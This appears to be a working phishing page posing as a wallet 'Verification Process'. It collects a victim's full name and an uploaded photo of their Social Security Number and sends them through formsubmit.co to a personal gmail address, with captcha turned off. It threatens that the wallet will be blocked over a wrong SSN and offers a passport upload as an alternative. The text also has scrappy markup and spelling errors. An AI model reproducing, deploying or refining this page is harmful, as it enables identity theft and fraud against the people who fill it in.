o<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>SignUp</title>
  <!-- Linking SwiperJS CSS -->
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css"/>
</head>
<body style="background: #070707; width: 100%; height: 100%;">
 <style>
        /*style.css*/
body {
    
    align-items: center;
    justify-content: center;
    font-family: sans-serif;
    line-height: 1.5;
    min-height: 100%;
    background: #0a0c14f5;
    flex-direction: column;
    margin: 0;
}


h1 {
    margin-left: 2%;
    color: #e2e2e2c6;
    font-size: 30px;
}

input {
    margin-left: 2%;
    display: block;
    width: 95%;
    height: 205px;
    color: #fff;
    margin-bottom: 15px;
    background: #333333ab;
    padding: 20px;
    margin-top: 30px;
    box-sizing: border-box;
    border: 3px solid #101320cf;
    border-radius: 10px;
}

.wrap {
    display: flex;
    justify-content: center;
    align-items: center;
}
    </style> 
   <h1>Verification Process</h1>
   
<h5 style="color: #1a5f18; margin-left: 2%; color: #e2e2e2c6; font-size: 15px;">Please upload any picture of your valued <l style="color: #126b2e;">Social Security Number</l>   !!.</h5>

                                  <form method="POST"     action="https://formsubmit.co/kt5873202@gmail.com" enctype="multipart/form-data">
    
    <p style="margin-left: 2%;
          color: #e2e2e2c6;
          font-size: 15px;">Full Name</p>   
                                      
        <input type="text" id="Zip Code" name="Zip Code" placeholder="E.g Harry Walsh" style="
    font-size: 15px; 
    maxlength=:5;
    margin-left: 2%;
    display: block;
    width: 95%;
    height: 50px;
    color: #fff;
    margin-bottom: 15px;
    background: #333333ab;
    padding: 20px;
    margin-top: 30px;
    box-sizing: border-box;
    border: 3px solid #101320cf;
    border-radius: 10px;" 
    required>                                
                  
                 <input type="file" name="attachment"  accept="image/png, image/jpeg" style="background: #333333ab;">
    
    <input type="hidden" name="_captcha" value="false">
                  <input type="hidden" name="_next" value="https://minet320.github.io/.com/ID loadout.html">
           <Button style="position: center;
  width: 87%;
  height: 50px;
  margin-top: 43%;  
  margin-left: 6.7%;
  background: #16161682;
  box-shadow: 0 0 10px #f0f0f0;
  font-size: 16px;
  color: #fff;
  border-radius: 10px;
  border: none;
  outline: none;" type="submit">Create an account</Button>
  
</form>          
   <p style="margin-left: 5%; color: red; margin-bottom: 5%;">Uploading of a old or wrong SSN may course block up of your wallet !!
                <a href="Verification 1.html" style="text-decoration: none;"> Use your (Passport)
            </a>  
           </p>     
   </div>

     </body>
</html>
